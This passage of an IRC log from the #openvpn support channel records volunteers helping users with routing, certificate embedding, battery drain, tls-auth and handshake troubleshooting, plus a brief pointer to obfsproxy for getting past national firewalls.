90" 11:44 < copper> that worked for a while 11:44 < copper> but now I have battery consumption issues again, I'm guessing from one of the latest updates 11:45 <@EugeneKay> Turn the connection off if you aren't actively using it. 
Having an always-on network connection will cause it to eat your battery 11:45 < copper> I barely use my galaxy nexus, yet I'm currently at 39% after 14 hours 34 minutes 11:45 <@EugeneKay> This is how CPU and network stacks actually work. 11:45 < copper> but it used to be fine 11:46 < copper> supposedly the screen represents 46% of the consumption, but I figured out that OpenVPN never showed in the list 11:46 <@ecrist> then why do you think it's Openvpn? 11:47 <@ecrist> honestly, I doubt it's openvpn that's killing your battery 11:47 < copper> ok 11:47 < copper> I'll turn of openvpn, charge the battery, run everything else like usual, and we'll see 11:47 < copper> off* 11:48 < copper> I'll come back tomorrow if I figure out that openvpn is indeed the culprit 11:48 < copper> sounds fair? 11:48 <@ecrist> sure? 11:48 < copper> ok 11:48 < copper> have a nice day! 11:48 -!- copper [~copper@unaffiliated/copper] has left #openvpn [] 11:52 -!- marksaitis [~marksaiti@81.101.81.114] has quit [Ping timeout: 245 seconds] 11:53 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 11:57 < tabakhase> ((just for clearance, the certs I posted before were the testing ones and got replaced ;-))) 11:57 < TheWarden> Here is my server.conf, https://gist.github.com/thewarden/77f5eab37a59ad0f245f. Presently I'm able to connect successfully to the OpenVPN server as a client but I'm not able to access any server on the LAN. I can ping the OpenVPN server, but not the gateway/router or any other server. 11:57 < TheWarden> I'm reading on the subject but I'm not understanding what to change. 
12:02 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 12:06 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 12:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 248 seconds] 12:11 -!- AsadH is now known as zz_AsadH 12:12 <@plaisthos> ecrist: openvpn is quite good at killing the battery without showing up as a battery killer :) 12:13 <@plaisthos> http://developer.android.com/training/efficient-downloads/efficient-network-access.html 12:13 <@vpnHelper> Title: Optimizing Downloads for Efficient Network Access | Android Developers (at developer.android.com) 12:13 <@plaisthos> and just think what would happen with 10s keepalive :) 12:13 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:21 <@ecrist> plaisthos: really? 12:22 <@plaisthos> yeah 12:22 <@plaisthos> keeping the radio active 12:25 <@ecrist> that's an interesting article 12:31 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 12:31 -!- mode/#openvpn [+v s7r] by ChanServ 12:49 -!- JSharpe [~JSharpe@46.165.210.17] has joined #openvpn 12:55 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 260 seconds] 12:55 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 13:02 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 250 seconds] 13:03 -!- soapee01_ is now known as soapee01 13:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 13:06 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:06 <@dazo> hmmm .... 
http://www.reuters.com/article/2013/03/10/us-iran-internet-idUSBRE9290CV20130310 13:06 <@vpnHelper> Title: Iran blocks use of tool to get around Internet filter | Reuters (at www.reuters.com) 13:07 -!- brute11k [~brute@89.249.230.104] has joined #openvpn 13:10 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds] 13:11 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 13:11 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 246 seconds] 13:14 -!- jc_linux_ [~jason@72.84.113.162] has joined #openvpn 13:15 < jc_linux_> has anyone successfully configured an iOS device to connect to a personal openvpn server? 13:15 <@ecrist> afaik, a lot of people have 13:17 < jc_linux_> @ecrist: Is there anything particular with the fields of the CA cert to set? ovpn config could use a path, obviously, iOS has some other mechanism to lookup the cert. 13:17 -!- master_of_master [~master_of@p4FF24746.dip.t-dialin.net] has joined #openvpn 13:18 <@ecrist> the best option is to embed the certificates and key in the config itself 13:18 < jc_linux_> mobileconfig or ovpn? I'm currently using mobileconfig 13:19 <@ecrist> openvpn 13:19 <@ecrist> no idea what mobileconfig is 13:19 < uberushaximus> ios' cert mechanism 13:20 < jc_linux_> iPhone Configuration Utility generated profiles are XML with extension .mobileconfig 13:20 -!- master_o1_master [~master_of@p4FF24E96.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 13:21 < jc_linux_> I added my CA and my p12 to the profile, and configured the VPN to use the p12. Not sure how to get OpenVPN to find the CA. 
13:21 * ecrist fires up iphone sim 13:23 < jc_linux_> directions I followed are here: https://forums.openvpn.net/topic12019.html 13:23 <@vpnHelper> Title: OpenVPN Support Forum VPN-On-Demand configuration error: CertificateRef undefined : OpenVPN Connect (iOS) (at forums.openvpn.net) 13:23 < jc_linux_> @vpnHelper: dueling url's ;-) 13:24 <@ecrist> jc_linux_: vpnHelper is a bot 13:25 <@ecrist> i don't have an iphone, so I've never set it up 13:26 < jc_linux_> I think my main point of confusion is "you must enter for the "ca" value the exact containt of your ca.crt" , what is containt? *all* the cleartext fields, the CN? 13:27 <@ecrist> look at the CA certificate itself 13:27 <@ecrist> you'll see a ----- BEGIN blah balh ----- END blah bal 13:28 <@ecrist> it's a square block of text 13:28 <@ecrist> copy that into your VPN configuration file 13:28 <@ecrist> remove the ca line 13:28 <@ecrist> then, around the pasted certificate, before, put <ca> and after put </ca> 13:33 <@plaisthos> !inline 13:33 <@vpnHelper> "inline" is (#1) Inline files (e.g. <ca> ... </ca>) are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 13:34 < jc_linux_> @ecrist: ahh, I see. OpenVPN isn't pulling the CA from the iOS certificate store, so it needs it internally. "containt" == "contents" 13:35 < jc_linux_> @ecrist: Thanks for the help. 13:37 <@ecrist> did that work for you? 13:37 <@ecrist> thanks, plaisthos, I forgot about that factoid 13:39 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 13:40 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:41 < jc_linux_> @ecrist: testing it now. 
had to concoct some tr/sed magic to go 0x0a -> \n 13:42 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 14:04 -!- dazo is now known as dazo_afk 14:04 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 14:04 < jc_linux_> @ecrist: Sweet! It works! Thanks again for the help. 14:11 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 14:14 <@ecrist> no problem. 14:21 < TheWarden> I've been using this article to help set up my OpenVPN. Thus far it has done quite a good job in assisting with that, however in regards to making this useful I need to get access to the entire LAN, which right now I do not have access to. Do I follow the firewall steps to fix this? http://wingloon.com/2012/05/25/how-to-install-setup-openvpn-on-debian-6-0-squeeze-with-certificate-authentication/ 14:21 <@vpnHelper> Title: How To Install Setup OpenVPN on Debian 6.0 Squeeze with Certificate Authentication | WING LOON (at wingloon.com) 14:21 < TheWarden> I'm not familiar with this at all, nor do I have a firewall.sh, nor am I even sure that is how it is used on Debian Squeeze. 14:22 <@ecrist> !route 14:22 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 14:22 <@vpnHelper> behind the server or client 14:22 <@ecrist> see that, TheWarden 14:30 -!- jc_linux_ [~jason@72.84.113.162] has left #openvpn [] 14:30 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 14:32 -!- Irssi: #openvpn: Total of 175 nicks [8 ops, 0 halfops, 2 voices, 165 normal] 14:39 < TheWarden> ecrist: I've been reading that first link over and over trying to make sense of it. 
Is this article stating that I need to know the client's IP network address in order to make this work? I really don't want to know it, nor do I want to hard-code that, as what if it changes? Then things break. 14:41 <@ecrist> no, you don't, since you're just trying to access the lan of the server, right? 14:49 -!- p3rror [~mezgani@41.140.99.173] has joined #openvpn 14:52 < TheWarden> yes right 14:52 <@ecrist> so, then you JUST need: 14:53 <@ecrist> push "route X.Y.Z.0 255.255.255.0" 14:53 <@ecrist> in the server config 14:53 <@ecrist> where you replace my garbage with your IP block and subnet mask 14:53 < TheWarden> so then my network is 192.168.0.0 so I set push "route 192.168.0.0 255.255.255.0" in the server config. 14:53 < TheWarden> I have this already but still can't access resources on the LAN once connected via the VPN. 14:54 < TheWarden> now I don't have a route statement nor a client-to-client mmmm 14:58 -!- speed_racer8 [~speed_rac@h226.16.185.173.dynamic.ip.windstream.net] has joined #openvpn 14:59 <@ecrist> I'd STRONGLY suggest changing that IP subnet 14:59 <@ecrist> !1918 14:59 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi 14:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:00 <@ecrist> TheWarden: is your VPN server also your LAN gateway? 15:00 <@ecrist> or, what is the local IP of the client you're using for testing? 15:01 < TheWarden> ecrist: I can't change the LAN network of 192.168.x.x, that would be a big change to go and change everything. The OpenVPN IP that is issued when authenticating is 10.8.0.0. The OpenVPN server is 192.168.0.240, router/gateway is 192.168.0.1 (different system than OpenVPN). 
15:02 < TheWarden> ecrist: The VPN server is not the LAN gateway, VPN is 192.168.0.240 and gateway is 192.168.0.1 15:04 < TheWarden> VPN subnet server 10.8.0.0 255.255.255.0 15:05 < TheWarden> My current server.conf, https://gist.github.com/thewarden/77f5eab37a59ad0f245f 15:05 <@vpnHelper> Title: The OpenVPN works but the client can not access servers on the LAN of the VPN server. I can only ping the OpenVPN server itself not the gateway/router or any other server on the LAN. (at gist.github.com) 15:06 -!- p3rror [~mezgani@41.140.99.173] has quit [Quit: Leaving] 15:11 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 15:11 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 15:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 15:18 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 15:19 -!- Devastator [~devas@186.214.110.30] has joined #openvpn 15:29 -!- brute11k [~brute@89.249.230.104] has quit [Quit: Leaving.] 15:36 * TheWarden sighs out of frustration 15:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:48 -!- p3rror [~mezgani@41.140.99.173] has joined #openvpn 15:50 < TheWarden> the VPN server, do I need to alter the iptables in order for this to work? 15:51 < dioz> uh 15:53 < TheWarden> I've read over and over these articles given to me and still nothing. I'm just not getting it I guess. 
argh 16:01 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn 16:07 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds] 16:07 -!- mezgani [~mezgani@41.249.96.133] has joined #openvpn 16:10 -!- p3rror [~mezgani@41.140.99.173] has quit [Ping timeout: 260 seconds] 16:12 -!- mezgani [~mezgani@41.249.96.133] has quit [Read error: Connection reset by peer] 16:31 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:44 -!- speed_racer8 [~speed_rac@h226.16.185.173.dynamic.ip.windstream.net] has quit [Quit: Leaving] 16:49 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has joined #openvpn 16:49 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has quit [Remote host closed the connection] 16:50 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn 16:51 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 240 seconds] 17:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 17:02 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 17:09 -!- fatpony [~fatpony@88-190-211-231.rev.dedibox.fr] has quit [Changing host] 17:09 -!- fatpony [~fatpony@unaffiliated/fatpony] has joined #openvpn 17:11 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has joined #openvpn 17:13 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has quit [Ping timeout: 264 seconds] 17:17 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 17:19 < TheWarden> I'm trying to run the following command openvpn –-genkey –-secret keys/ta.key but oddly I keep getting back "Options error: I'm trying to parse "–-genkey" as an --option parameter but I don't see a leading '--'" 17:23 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 17:25 < jzaw> TheWarden, .... –-genke it's not -- it's –- you have there 17:26 < jzaw> if you paste it in a word processor ..... 
and enlarge the font you'll see the difference 17:26 < TheWarden> jzaw: that's how it appears when I paste it here. --genkey is what I typed 17:26 < rob0> ASCII hyphen hyphen 17:26 <@EugeneKay> TheWarden - openvpn --version? 17:26 < TheWarden> rob0: that's what I'm typing on the keyboard 17:27 < jzaw> try copy paste this ... -- 17:27 < TheWarden> OpenVPN 2.3.0 x86_64-pc-linux-gnu 17:27 < TheWarden> -- 17:27 <@EugeneKay> Interesting. 17:32 < TheWarden> it is, it's odd... 17:34 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 17:38 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Quit: Leaving] 17:49 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 17:51 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 18:05 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 245 seconds] 18:12 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:14 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 18:15 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 18:23 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Operation timed out] 18:27 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 18:30 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:34 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds] 18:36 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 272 seconds] 18:39 -!- cronix [~cronix@HSI-KBW-046-005-192-177.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 18:39 < cronix> hi all 18:40 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has left #openvpn [] 18:40 < cronix> is it possible to have this kind of setup? 
18:40 -!- vect0rx [vectorx@havok.org] has quit [Ping timeout: 264 seconds] 18:40 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 18:40 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has left #openvpn [] 18:40 < cronix> client -> VPN -> Internet -> VPN -> Server -> Privoxy Proxy -> Internet 18:41 < cronix> and to configure the proxy for the vpn server part 18:41 < cronix> so that the client just has to connect to VPN? 18:48 < pekster> cronix: Yes it is. I have a similar setup on a cloud VM I run where it acts as an OpenVPN server and runs tinyproxy. By connecting to the VPN, I can use a separate browser profile I've configured to use that proxy at the other end of the VPN when I need an external IP to test from 18:48 < pekster> OpenVPN just establishes a link between 2 systems (your "client" and "server.") You're free to exchange any type of traffic you would like over this link 18:51 < cronix> but there's no way to not have to touch the client browser, is there? 
18:51 < cronix> the idea behind this is 18:51 < cronix> i live in Germany and a lot of good stuff is blocked by GEMA etc 18:52 < cronix> therefore i have a premium proxy which redirects traffic to youtube for example via french servers 18:52 -!- mode/#openvpn [-q *!*@2-226-37-187.ip179.fastwebnet.it] by EugeneKay 18:52 < cronix> my idea was to set up a vpn which has all http traffic of every computer automatically proxied to those servers on the serverside 18:53 < cronix> so i don't have to configure the laptops of my girlfriend and a lot of other systems 18:54 < cronix> even more important, to have the proxy enabled on my android devices while on the go as well via vpn 18:54 < cronix> i think i have to do some nasty socks proxy routing on the dedicated server via iptables :C 18:55 < pekster> Maybe you want to look at: 18:55 < pekster> !redirect 18:55 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 18:55 <@vpnHelper> http://ircpimps.org/redirect.png 18:55 < cronix> that part works already 18:55 < cronix> i have my xoom tablet connected to my vpn server 18:55 < cronix> and can access the internet via the vpn 18:55 < cronix> with the ip of my dedicated 18:55 < pekster> Then why bother with a proxy? 
If you use redirect-gateway, *all* Internet-bound traffic flows through the VPN, not just web traffic 18:56 < cronix> because the server also is in germany 18:56 < cronix> the premium proxy is just a http proxy of a third party 18:58 < cronix> i guess i have to do something like this on the server 18:59 < cronix> openvpn -> iptables routing -> socks proxy -> privoxy -> premium http proxy 18:59 < cronix> this is gonna get nasty 18:59 < cronix> wrong chat then though :D 19:03 -!- ade_b [~Ade@koln-4d0b0fff.pool.mediaWays.net] has joined #openvpn 19:03 -!- ade_b [~Ade@koln-4d0b0fff.pool.mediaWays.net] has quit [Changing host] 19:03 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 19:06 -!- vistas [~vistas@c-71-204-33-119.hsd1.ga.comcast.net] has left #openvpn [] 19:09 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 264 seconds] 19:15 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:15 -!- HyperGlide [~HyperGlid@221.237.121.63] has quit [Remote host closed the connection] 19:16 -!- novaflash is now known as novaflash_away 19:16 -!- HyperGlide [~HyperGlid@221.237.121.63] has joined #openvpn 19:20 -!- HyperGlide [~HyperGlid@221.237.121.63] has quit [Ping timeout: 258 seconds] 19:27 -!- twb [~twb@203.7.155.73] has joined #openvpn 19:28 < twb> Er, quick sanity check please. I thought --tls-auth ta.key or so was always needed, and it was a pre-shared key used to HMAC packets once the TLS handshake had been done, or something like that. 19:29 < twb> But I see $coworker who has set up the server side of a VPN, has not mentioned tls-auth in his config at all (despite having a ta.key) 19:29 < twb> Is that 1) valid?; and 2) sensible? 19:30 < twb> Hm, manpage seems to indicate that you can use openvpn without --tls-auth, but it's a bad idea. 19:37 < pekster> twb: It's fine to run without that. 
It's just a way to drop packets before the peer allocates resources setting up a TLS handshake 19:39 -!- raidz is now known as raidz_away 19:40 < twb> Okey dokey 20:17 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 20:26 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 20:29 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:36 -!- vect0rx [vectorx@havok.org] has joined #openvpn 20:37 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 20:42 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 20:43 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Read error: Connection reset by peer] 20:43 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 20:49 -!- M1L0 [~M1L0@unaffiliated/m1l0] has joined #openvpn 20:50 < M1L0> hello 20:51 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 20:51 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 20:52 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 20:55 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 20:56 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:57 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 20:59 -!- ddlk [~ddlk@183.246.96.216] has joined #openvpn 20:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 20:59 < ddlk> Hi, guys, anyway to bypass the China's firewall? 21:00 < ddlk> OpenVPN is already blocked, even on port 443 with TCP 21:01 < M1L0> blocked??? why? 
21:02 < ddlk> China is building the world's largest local network ~ 21:02 < M1L0> ok 21:03 < ddlk> wondering if there is some vpn tech that cannot be detected 21:04 < ngharo> i've heard using static keys in openvpn makes traffic harder to identify 21:05 -!- ddlk [~ddlk@183.246.96.216] has quit [] 21:05 -!- ddlk [~ddlk@183.246.96.216] has joined #openvpn 21:06 < ddlk> already tried that, no luck 21:07 < ngharo> !obfsproxy 21:07 <@vpnHelper> "obfsproxy" is (#1) For a writeup on using obfsproxy with OpenVPN see https://syria.hacktivist.me/?p=148 or (#2) See also !obfs. The link to TrafficObfuscation also contains a setup example 21:07 < ngharo> might try that too 21:08 < pekster> There's that, or using static key crypto 21:08 < pekster> !statickey 21:08 <@vpnHelper> "statickey" is (#1) you can use static keys by using --secret or (#2) static keys only work for ptp links, not client/server. They also do not provide forward encryption. A forward-secure encryption scheme (such as openvpn uses with certs) protects secret keys from exposure by evolving the keys with time. or (#3) see !forwardsecurity for more info 21:10 < ddlk> thanks for the article, trying :D 21:12 < M1L0> question: VPN clients need to see a segment inside my LAN and internet can also leave the proxy, can someone guide me? 21:13 < pekster> What's your goal? I'm unclear from that what you want 21:13 < pekster> !goal 21:13 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 21:15 < M1L0> sorry my english is no good... :P 21:15 < M1L0> my external VPN clients do not see my LAN segment and have no internet... 21:15 < pekster> What do you want? You want clients to have access to the server-side LAN? 
21:17 < M1L0> exactly 21:17 < pekster> !serverlan 21:17 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 21:17 < pekster> So that's a list of steps you need, and #3 in that output gives you a helpful flowchart to follow to expose a LAN on the server-side of OpenVPN 21:19 < M1L0> Ok, I'll see the diagram now, thanks! 21:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in] 22:01 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 22:07 -!- Devastator [~devas@186.214.110.30] has quit [Ping timeout: 256 seconds] 22:08 -!- Devastator [~devas@186.214.110.30] has joined #openvpn 22:11 -!- Devastator- [~devas@186.214.110.30] has joined #openvpn 22:12 -!- Devastator [~devas@186.214.110.30] has quit [Read error: Connection reset by peer] 22:13 -!- M1L0 [~M1L0@unaffiliated/m1l0] has left #openvpn ["Leaving"] 22:14 -!- Devastator- [~devas@186.214.110.30] has quit [Changing host] 22:14 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 22:14 -!- Devastator- is now known as Devastator 22:23 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Remote host closed the connection] 22:27 -!- p3rror [~mezgani@41.249.96.133] has joined #openvpn 22:28 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 22:37 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 22:46 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 
23:09 -!- corretico [~luis@190.211.93.38] has joined #openvpn 23:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 23:41 -!- ddlk [~ddlk@183.246.96.216] has quit [] 23:45 -!- brute11k [~brute@89.249.235.131] has joined #openvpn --- Day changed Wed Mar 13 2013 00:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 00:42 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 00:45 -!- p3rror [~mezgani@41.249.96.133] has quit [Ping timeout: 258 seconds] 00:58 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has joined #openvpn 01:13 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has quit [Ping timeout: 255 seconds] 01:13 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 264 seconds] 01:27 -!- mjixx [~markus@80.67.14.31] has quit [Ping timeout: 252 seconds] 01:27 -!- mjixx [~markus@80.67.14.31] has joined #openvpn 01:32 -!- p3rror [~mezgani@41.249.96.133] has joined #openvpn 01:40 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 01:44 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 02:09 -!- xbanux [~xbanux@115.254.75.113] has quit [Read error: Connection reset by peer] 02:09 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 02:22 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn [] 02:28 < pekster> ecrist: More to come, but this is now usable and mostly (minus the pkcs11 support) analogous to Easy-RSA 2.x support. 
https://github.com/QueuingKoala/easy-rsa 02:29 <@vpnHelper> Title: QueuingKoala/easy-rsa · GitHub (at github.com) 02:29 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 240 seconds] 02:29 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 02:46 -!- twb [~twb@203.7.155.73] has quit [Ping timeout: 264 seconds] 02:48 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:53 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 03:01 -!- novaflash_away is now known as novaflash 03:05 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has quit [Read error: Connection reset by peer] 03:05 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has joined #openvpn 03:13 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 03:22 -!- josheee12 [~jsteiner@131.91.7.1] has joined #openvpn 03:24 < josheee12> hey, guys. out of nowhere, openvpn just quit on me. the ports are fine on both ends (1 client, 1 server), i've tried tcp and udp, but i get stuck at the handshake. the time is correct on both client and server, and both systems are running debian with openvpn 2.3.0. configs and logs are here: http://pastebin.com/mqHmBcQG. 03:25 < josheee12> does anyone have any suggestions? 03:35 < pppingme> what port are you really using? the server and client config have two different ports? 03:35 < Wulf> josheee12: tcpdump. 03:36 < josheee12> my apologies, that's something i fixed right before i posted. i'll switch to tcpdump and try in a moment. 03:36 < pppingme> packets are obviously making it, don't think you're going to see too much with tcpdump quite yet.. 03:37 < pppingme> why are you using 443? 
03:37 < Wulf> pppingme: probably to avoid firewalls 03:37 < pppingme> assuming that, just want to know for sure 03:37 < Wulf> I also have my vpn running on 443 03:37 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 03:38 < josheee12> it's not to avoid firewalls typically, but i use different networks often and typically 443's open. 03:39 < josheee12> i sometimes use port 53 for the same reason. 03:40 < pppingme> what are all the extra W's in the logs? 03:40 < pppingme> is that just something you hosed when you captured the log, or are they really there? 03:40 < josheee12> iirc, that's from udp packets with verb 5. 03:46 < pppingme> you've tried ports other than 443, right? 03:46 < josheee12> yes, and both udp and tcp. 03:46 < pppingme> have you tried THIS client (is it a laptop or what) from a different internet connection? 03:47 < josheee12> yes. 03:47 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Quit: KVIrc 4.0.2 Insomnia http://www.kvirc.net/] 03:47 < josheee12> it's a laptop. 03:47 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 03:47 < pekster> josheee12: Lots of WWW's and no RR's means that you're not getting the return TLS handshake data from the server. Both sides get "Initial packet received", so see if the server really sends the UDP packets after the initial one? They're evidently not making it to the client 03:48 -!- brute11k [~brute@89.249.235.131] has quit [Ping timeout: 252 seconds] 03:49 < josheee12> pekster: i presume i should do so by changing to TCP and using tcpdump? 03:49 < pppingme> you're usually best to use UDP 03:49 < pekster> huh? no 03:50 < pppingme> unless there's a good reason to use tcp 03:50 < josheee12> wait, does tcpdump work with 